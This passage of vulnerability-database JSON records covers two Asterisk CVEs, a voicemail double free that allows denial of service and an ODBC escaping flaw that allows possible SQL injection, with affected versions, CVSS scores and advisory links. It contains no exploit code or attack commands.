              "matchCriteriaId": "DF6135C4-7930-4DD5-80CD-4DC7F53956D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D40002A-564E-425C-BA2A-7C4A8F8DAFD7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "521C4DB2-7127-4BA9-94FC-AB0E9E06FE2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8C905DC1-8AB8-4D83-BB5B-FA4DABC58229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "ECC74B5D-97A1-46FF-AFA3-5D5E4A0BF3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2D98C7C-94A8-4348-AF22-04A41FB6F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "85D39A99-E9A6-4860-BC61-56CA2FC3238B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "845DA0A4-1983-4E82-99C8-B7FBF47C632E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A63FBB7-F1CF-4603-848F-980742D2ED36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10B2084F-3AF4-4008-899C-6C1E43715201",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "217C13A5-9F8A-4392-858F-2FC88B03EB0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B282462-900C-492E-98DE-65364E62F5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687784F0-9ACC-435D-81F9-1E1B0F61010C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9D7D020C-FE32-408B-BE37-58835FD3D95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "39B7938F-7370-4F67-B0CD-1C14DE2E4E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC587195-5973-423B-8BF9-3E0B27363B76",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "82F91FE8-C320-466B-AF08-67319A00A2BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "DCFF0E1C-B455-4C18-8AA1-10408234327B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "6372EEEA-2759-4B6A-BD03-D84DC956E80E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "26DF0C53-9F6A-4233-B163-AEC1F9886387",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "79A063D7-553F-486F-9079-D95C8047B05E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B606D854-FC06-4314-AD24-FEEA3796A0AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "DEBB0786-D912-48D1-BC63-E0F87E078154",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1C39DD70-1220-4CC6-95B4-CE18CA5787CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B0005F0B-9C87-4160-9416-A7C136FCD5AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "12073B6A-14B1-490B-B267-A68194C68BDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "198C92F2-8268-4045-B297-17E0D1F9726E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5D3A3C00-EA83-4EF4-8681-DB5616132607",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5FE59F0F-44B0-4940-8368-F360EE610114",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3647F0E3-196F-486B-9BAB-75ED24A055ED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1FBC4A5F-FB16-42B2-9689-25F8B3D0F521",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B788D6E2-78E8-4DE1-81F5-40D52263E7F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "51358F60-4D6C-4DBA-86B0-E12C48A67456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D51C9952-97F4-4326-8F7D-34579D3686AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3711A75C-AF87-4A5C-8B35-1CF834C12D2A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E7FFD09D-21A3-4E98-B1FA-C7A16C243D91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "FAC6591A-BC5A-4CA9-90BC-0B686F74127B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "01BAF29D-8679-40F3-AB6C-DA5C3787271C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B42229C3-B18E-4D50-9B98-202CB1805CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "15DF192B-A8D5-4FCC-B469-505A8FA11D00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D24E01F7-604D-4D05-B698-3BDEF7B69EF8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "A54A74F4-8A6C-4090-88C2-8AB5A606C59B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Double free vulnerability in apps/app_voicemail.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones allows remote authenticated users to cause a denial of service (daemon crash) by establishing multiple voicemail sessions and accessing both the Urgent mailbox and the INBOX mailbox."
    },
    {
      "lang": "es",
      "value": "vulnerabilidad de doble liberaci\u00f3n en apps/app_voicemail.c en Asterisk Open Source v1.8.x anteriores v1.8.13.1 y v10.x anteriores a v10.5.2, Certified Asterisk v1.8.11-certx anteriores a v1.8.11-cert4, y Asterisk Digiumphones v10.x.x-digiumphones anteriores a v10.5.2-digiumphones permite a usuarios autenticados remotos a provocar una denegaci\u00f3n de servicio (ca\u00edda del demonio) debido al establecimiento de m\u00faltiples sesiones correo de voz y accediendo a buz\u00f3n urgente (Urgent) a trav\u00e9s del buz\u00f3n de entrada INBOX."
    }
  ],
  "id": "CVE-2012-3812",
  "lastModified": "2024-11-21T01:41:40.210",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2012-07-09T22:55:01.260",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-011.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/50687"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/50756"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2012/dsa-2550"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/54317"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20052"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-011.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/50687"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/50756"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2012/dsa-2550"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/54317"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-20052"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2022-04-15 05:15

Modified

2024-11-21 06:54

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html	Third Party Advisory, VDB Entry
cve@mitre.org	https://downloads.asterisk.org/pub/security/	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2022-003.html	Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Mailing List, Third Party Advisory
cve@mitre.org	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2022-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.debian.org/security/2022/dsa-5285	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
debian	debian_linux	10.0
debian	debian_linux	11.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1533FF1D-ABC5-4F45-8FB4-7441C03422F4",
              "versionEndExcluding": "16.25.2",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "496A20DA-23D7-435B-8EA9-3AC585DAAB72",
              "versionEndExcluding": "18.11.2",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4FD25061-F1D0-4849-9905-CB4AEDC59363",
              "versionEndExcluding": "19.3.2",
              "versionStartIncluding": "19.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
              "matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "B416D491-F0D0-4F9E-BEE0-236D9FFF03FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "A21DB030-7BE3-4ED0-8212-7FACC715136F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "8BF4E88F-5400-4B79-ADBA-ECED941AF092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert13:*:*:*:*:*:*",
              "matchCriteriaId": "21C227EC-7084-4F08-AA04-271DB4561823",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "7A643445-8A73-4ACC-8A96-CA8D6AC8B229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "BD980324-52E2-4D3E-B8D8-52A2DB100306",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "4D5B8321-033A-47C5-A277-BE056C5ADB30",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "12A2585A-A13F-4FD5-9A65-273B7D8A99C8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
    },
    {
      "lang": "es",
      "value": "Se ha detectado un problema en Asterisk versiones hast 19.x y Certified Asterisk versiones hasta 16.8-cert13. El m\u00f3dulo func_odbc proporciona una funcionalidad de escape posiblemente inapropiada para los caracteres de barra invertida en las consultas SQL, resultando en que los datos proporcionados por el usuario creen una consulta SQL rota o posiblemente una inyecci\u00f3n SQL. Esto ha sido corregido en versiones 16.25.2, 18.11.2 y 19.3.2, y 16.8-cert14"
    }
  ],
  "id": "CVE-2022-26651",
  "lastModified": "2024-11-21T06:54:15.633",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-04-15T05:15:06.683",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2022/dsa-5285"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
